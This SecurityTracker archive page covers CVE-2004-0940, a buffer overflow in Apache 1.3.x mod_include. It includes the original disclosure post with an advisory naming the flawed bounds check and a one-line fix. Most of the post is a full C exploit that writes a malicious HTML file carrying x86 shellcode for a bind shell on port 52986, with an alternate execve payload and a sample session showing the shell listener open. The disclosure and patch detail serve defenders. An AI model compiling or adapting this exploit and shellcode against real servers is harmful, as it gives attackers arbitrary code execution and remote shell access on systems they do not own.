Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1011783 |
|
SecurityTracker URL: http://securitytracker.com/id/1011783
|
|
CVE Reference:
CVE-2004-0940
(Links to External Site)
|
Updated: Mar 2 2006
|
Original Entry Date: Oct 19 2004
|
Impact:
Execution of arbitrary code via local system, User access via local system
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 1.3.x
|
Description:
Crazy Einstein reported a buffer overflow in Apache mod_include. A local user may be able to gain elevated privileges.
It is reported that the get_tag() function contains a buffer overflow that can be triggered, for example, from the handle_echo() function. A local user can create specially crafted HTML that, when processed by Apache, will execute arbitrary code with the privileges of the httpd child process.
|
Impact:
A local user can execute arbitrary code with the privileges of the Apache httpd child process.
|
Solution:
The vendor has issued a fixed version (1.3.33), available at:
http://httpd.apache.org/
|
Vendor URL: httpd.apache.org/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Tue, 19 Oct 2004 06:30:35 -0700 (PDT)
Subject: The overflow in apache 1.3.x mod_include module [advisory and exploit]
|
--0-1381269801-1098192635=:62976
Content-Type: text/plain; charset=us-ascii
Content-Id:
Content-Disposition: inline
Advisory & exploit code you can find in attachments
_______________________________
Do you Yahoo!?
Declare Yourself - Register online to vote today!
http://vote.yahoo.com
--0-1381269801-1098192635=:62976
Content-Type: text/plain; name="85mod_include.c"
Content-Description: 85mod_include.c
Content-Disposition: inline; filename="85mod_include.c"
/*********************************************************************************
local exploit for mod_include of apache 1.3.x *
written by xCrZx /18.10.2004/ *
bug found by xCrZx /18.10.2004/ *
*
y0das old shao lin techniq ownz u :) remember my words *
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3 *
*
Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike) *
*********************************************************************************/
/*********************************************************************************
Technical Details: *
*
there is an overflow in get_tag function: *
*
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{ *
... *
term = c; *
while (1) { *
GET_CHAR(in, c, NULL, p); *
[1] if (t - tag == tagbuf_len) { *
*t = '\0'; *
return NULL; *
} *
// Want to accept \" as a valid character within a string. // *
if (c == '\\') { *
[2] *(t++) = c; // Add backslash // *
GET_CHAR(in, c, NULL, p); *
if (c == term) { // Only if // *
[3] *(--t) = c; // Replace backslash ONLY for terminator // *
} *
} *
else if (c == term) { *
break; *
} *
[4] *(t++) = c; *
} *
*t = '\0'; *
... *
*
as we can see there is a [1] check to determine the end of tag buffer *
but this check can be skiped when [2] & [4] conditions will be occured *
at the same time without [3] condition. *
*
So attacker can create malicious file to overflow static buffer, on *
which tag points out and execute arbitrary code with privilegies of *
httpd child process. *
*
Fix: *
[1*] if (t - tag >= tagbuf_len-1) { *
*
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf *
*
*********************************************************************************/
/*********************************************************************************
Example of work: *
*
[root@blacksand htdocs]# make 85mod_include *
cc 85mod_include.c -o 85mod_include *
[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html *
[root@blacksand htdocs]# chmod +x evil.html *
[root@blacksand htdocs]# netstat -na|grep 52986 *
[root@blacksand htdocs]# telnet localhost 8080 *
Trying 127.0.0.1... *
Connected to localhost. *
Escape character is '^]'. *
GET /evil.html HTTP/1.0 *
^] *
telnet> q *
Connection closed. *
[root@blacksand htdocs]# netstat -na|grep 52986 *
tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN *
[root@blacksand htdocs]# *
*********************************************************************************/
/*********************************************************************************
Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always *
*********************************************************************************/
/*********************************************************************************
Personal hello to my parents :) *
*********************************************************************************/
/*********************************************************************************
Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz *
*********************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define EVILBUF 8202
#define HTMLTEXT 1000
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"
int main(int argc, char **argv) {
char html[EVILBUF+HTMLTEXT];
char evilbuf[EVILBUF+1];
//can be changed
char shellcode[] =
// bind shell on 52986 port
"\x31\xc0"
"\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
"\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
"\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
"\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
//execve /tmp/sh <- your own program
/*
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/tmp/sh";
*/
char NOP[] = "\x90\x40"; // special nops ;)
char evilpad[] = "\\CRZCRZCRZCRZC"; // trick ;)
int padding,xpad=0;
int i,fd;
long ret=0xbfff8688;
if(argc>1) ret=strtoul(argv[1],0,16);
else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }
padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
while(1) {
if(padding%2==0) { padding/=2; break;}
else {padding--;xpad++;}
}
memset(html,0x0,sizeof html);
memset(evilbuf,0x0,sizeof evilbuf);
for(i=0;i<padding;i++)
memcpy(evilbuf+strlen(evilbuf),&NOP,2);
for(i=0;i<xpad;i++)
memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);
memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
*(long*)&evilbuf[strlen(evilbuf)]=ret;
sprintf(html,HTML_FORMAT,evilbuf);
printf("%s",html);
return 0;
}
--0-1381269801-1098192635=:62976
Content-Type: text/plain; name="85mod_include.adv.txt"
Content-Description: 85mod_include.adv.txt
Content-Disposition: inline; filename="85mod_include.adv.txt"
-------------------------------------
PUBLIC ADVISORY of xCrZx /18.10.2004/
=====================================
I. Intro
II. Details
III. Exploitation
IV. Solution
V. Outro
--------
I. Intro
========
mod_include is an apache standard module which allow users to
use some features in their html pages such as include file,
exec commands, echo, etc.
-----------
II. Details
===========
There is an overflow in get_tag() function, that was found by
me inside of mod_include.c:
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode)
{
...
term = c;
while (1) {
GET_CHAR(in, c, NULL, p);
[1] if (t - tag == tagbuf_len) {
*t = '\0';
return NULL;
}
/* Want to accept \" as a valid character within a string. */
if (c == '\\') {
[2] *(t++) = c; /* Add backslash */
GET_CHAR(in, c, NULL, p);
if (c == term) { /* Only if */
[3] *(--t) = c; /* Replace backslash ONLY for terminator */
}
}
else if (c == term) {
break;
}
[4] *(t++) = c;
}
*t = '\0';
...
}
as we can see there is a [1] check to determine the end of tag buffer
but this check can be skiped when [2] & [4] conditions will be occured
at the same time without [3] condition.
So attacker can create malicious file to overflow static buffer, on
which tag points out and execute arbitrary code with privilegies of
httpd child process.
for example, an overflow can be occured from handle_echo:
(or other similar functions handle_*())
static int handle_echo(FILE *in, request_rec *r, const char *error)
{
char tag[MAX_STRING_LEN];
...
while (1) {
if (!(tag_val = get_tag(r->pool, in, tag, sizeof(tag), 1))) {
return 1;
}
...
-----------------
III. Exploitation
=================
Exploit was created by me :) and successfully tested on apache 1.3.31 under
Linux RH9.0 (Shrike).
Vuln versions of apache: 1.3.x
------------
IV. Solution
============
To fix this vulnerability you must change one line in get_tag() function:
[1] if (t - tag == tagbuf_len) {
to
[1'] if (t - tag >= tagbuf_len-1) {
--------
V. Outro
========
y0das old shao lin techniq ownz u :) remember my words
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3
shoutz to: m00, LByte, ech0, ha1fsatan, 0xbadc0ded and others :)
and special hello to my parents :)
Copyright (C) xCrZx /18.10.2004/
--0-1381269801-1098192635=:62976--
|
|
Go to the Top of This SecurityTracker Archive Page
|
